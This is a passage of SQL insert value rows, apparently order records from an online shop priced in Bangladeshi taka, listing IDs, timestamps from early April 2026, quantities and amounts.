(831, 1, '2026-03-31 18:29:24', '2026-03-31 18:29:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(832, 1, '2026-03-31 23:35:06', '2026-03-31 23:35:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(833, 1, '2026-03-31 23:35:07', '2026-03-31 23:35:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(834, 1, '2026-03-31 23:35:08', '2026-03-31 23:35:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(835, 1, '2026-04-01 00:03:13', '2026-04-01 00:03:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(836, 1, '2026-04-01 06:05:44', '2026-04-01 06:05:48', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(837, 1, '2026-04-01 07:20:23', '2026-04-01 07:20:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(838, 1, '2026-04-01 09:34:21', '2026-04-01 09:34:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(839, 1, '2026-04-01 12:36:48', '2026-04-01 12:36:56', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(840, 1, '2026-04-01 12:54:59', '2026-04-01 12:55:26', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(841, 1, '2026-04-01 12:55:06', '2026-04-01 12:55:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(842, 1, '2026-04-01 12:55:07', '2026-04-01 12:55:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(843, 1, '2026-04-01 12:55:09', '2026-04-01 12:55:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(844, 1, '2026-04-01 12:55:10', '2026-04-01 12:55:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(845, 1, '2026-04-01 12:55:12', '2026-04-01 12:55:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(846, 1, '2026-04-01 12:55:13', '2026-04-01 12:55:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(847, 1, '2026-04-01 12:55:14', '2026-04-01 12:55:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(848, 1, '2026-04-01 12:55:16', '2026-04-01 12:55:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(849, 1, '2026-04-01 12:55:17', '2026-04-01 12:55:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(850, 1, '2026-04-01 12:55:19', '2026-04-01 12:55:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(851, 1, '2026-04-01 12:55:20', '2026-04-01 12:55:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(852, 1, '2026-04-01 12:55:22', '2026-04-01 12:55:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(853, 1, '2026-04-01 12:55:31', '2026-04-01 12:55:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(854, 1, '2026-04-01 12:55:36', '2026-04-01 12:55:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(855, 1, '2026-04-01 12:55:41', '2026-04-01 12:55:43', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(856, 1, '2026-04-01 12:55:47', '2026-04-01 12:55:48', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(857, 1, '2026-04-01 12:55:52', '2026-04-01 12:55:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(858, 1, '2026-04-01 14:26:28', '2026-04-01 14:26:49', NULL, 1, 0, 0, 1, 12.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 4051.2000, 4051.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 1, 0, NULL, NULL, 0),
(859, 1, '2026-04-01 15:26:28', '2026-04-01 15:26:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(860, 1, '2026-04-01 16:38:25', '2026-04-01 16:38:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(861, 1, '2026-04-01 18:50:57', '2026-04-01 18:50:59', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(862, 1, '2026-04-01 23:08:53', '2026-04-01 23:08:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(863, 1, '2026-04-02 00:53:09', '2026-04-02 00:53:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(864, 1, '2026-04-02 01:02:01', '2026-04-02 01:02:22', NULL, 1, 0, 0, 1, 12.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 4051.2000, 4051.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 1, 0, NULL, NULL, 0),
(865, 1, '2026-04-02 03:49:45', '2026-04-02 03:49:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(866, 1, '2026-04-02 07:06:30', '2026-04-02 07:06:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(867, 1, '2026-04-02 11:42:11', '2026-04-02 11:42:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(868, 1, '2026-04-02 13:31:20', '2026-04-02 13:31:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(869, 1, '2026-04-02 15:10:23', '2026-04-02 15:10:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(870, 1, '2026-04-02 19:56:17', '2026-04-02 19:56:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(871, 1, '2026-04-02 23:01:14', '2026-04-02 23:01:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(872, 1, '2026-04-03 01:49:15', '2026-04-03 01:49:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(873, 1, '2026-04-03 06:29:57', '2026-04-03 06:29:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(874, 1, '2026-04-03 07:49:04', '2026-04-03 07:49:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(875, 1, '2026-04-03 10:31:02', '2026-04-03 10:31:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(876, 1, '2026-04-03 13:59:49', '2026-04-03 13:59:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(877, 1, '2026-04-03 14:14:46', '2026-04-03 14:14:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(878, 1, '2026-04-03 17:33:26', '2026-04-03 17:33:49', NULL, 1, 0, 0, 1, 12.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 4051.2000, 4051.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 1, 0, NULL, NULL, 0),
(879, 1, '2026-04-03 20:05:55', '2026-04-03 20:05:58', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(880, 1, '2026-04-03 21:58:15', '2026-04-03 21:58:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(881, 1, '2026-04-04 00:28:10', '2026-04-04 00:28:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(882, 1, '2026-04-04 00:28:18', '2026-04-04 00:28:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(883, 1, '2026-04-04 02:23:36', '2026-04-04 02:23:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(884, 1, '2026-04-04 04:05:46', '2026-04-04 04:06:06', NULL, 1, 0, 0, 1, 12.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 4051.2000, 4051.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 1, 0, NULL, NULL, 0),
(885, 1, '2026-04-04 05:40:37', '2026-04-04 05:40:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(886, 1, '2026-04-04 05:49:06', '2026-04-04 05:49:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(887, 1, '2026-04-04 08:27:00', '2026-04-04 08:27:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(888, 1, '2026-04-04 12:03:26', '2026-04-04 12:03:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(889, 1, '2026-04-04 12:03:32', '2026-04-04 12:03:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(890, 0, '2026-04-04 12:49:58', '2026-04-04 12:49:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(891, 1, '2026-04-04 13:20:29', '2026-04-04 13:20:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
